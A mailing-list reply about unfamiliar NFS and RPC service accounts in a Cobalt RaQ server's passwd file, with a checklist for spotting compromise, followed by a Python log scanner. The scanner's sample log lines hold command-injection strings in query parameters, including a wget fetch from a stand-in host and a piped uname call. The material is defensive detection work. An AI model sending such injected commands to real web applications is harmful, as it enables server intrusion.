
Re: [cobalt-security] Odd entries in passwd file?



> At the very bottom there are two users I haven't seen before.. I know
> they look like services, but should they even be there?
>
> rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
> nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

I don't see them in /etc/passwd.
/sbin/nologin looks like it was some RPM package installed, maybe from
Red Hat.

>
>
> I removed them for the time being, not fully understanding why they
> are there to begin with.

One for Network File System, and one for Remote Procedure Calls.
Not really sure you need those services...

ssh listening at ports 81 and 444 means someone, maybe you, has set up
port forwarding to have a secure connection with the admin interface.

If you suspect your RaQ is being hacked, do the following:
1) download and install chkrootkit (from sources) http://chkrootkit.org;
run it and check if it says something is infected;

2) check the /tmp/ directory for suspicious files

3) check web.log for every site for commands like uname/wget being run
with php/cgi scripts.

Dmitry
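
Step 3 of the checklist above, as an added example that is not part of the original post: a scanner that decodes the query string of each request and reports those carrying `uname` or `wget`. It assumes the per-site web.log uses the Apache combined log format; the function name and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (assumed Apache combined log format, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2005:10:01:22 +0000] "GET /index.php?page=news HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
192.0.2.44 - - [12/Mar/2005:10:03:07 +0000] "GET /gallery.php?dir=;cd%20/tmp;wget%20http://example.invalid/a HTTP/1.0" 200 311 "-" "-"
192.0.2.44 - - [12/Mar/2005:10:03:09 +0000] "GET /cgi-bin/view.cgi?file=|uname+-a| HTTP/1.0" 200 87 "-" "-"
192.0.2.71 - - [12/Mar/2005:10:05:40 +0000] "GET /docs/wget-howto.html HTTP/1.0" 200 9042 "-" "Mozilla/4.0"
"""

# client IP, timestamp, method, request target, status code
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# The two commands named in the post, matched as whole words only.
COMMANDS = re.compile(r'(?<![\w-])(uname|wget)(?![\w-])')


def suspicious_requests(lines):
    """Return one dict per request whose query string carries uname or wget."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, when, method, target, status = m.groups()
        path, _, query = target.partition("?")
        # Decode twice so double-encoded input (%2577get) is still seen.
        decoded = unquote_plus(unquote_plus(query)).lower()
        found = sorted(set(COMMANDS.findall(decoded)))
        if found:
            hits.append({"ip": ip, "time": when, "method": method,
                         "path": path, "status": int(status),
                         "commands": found})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG.splitlines()):
        print("{time} {ip} {method} {path} -> {status} {commands}".format(**hit))
```

Only the query string is inspected, so a page that merely has `wget` in its path is not flagged; POST bodies are not written to the access log and need a separate check.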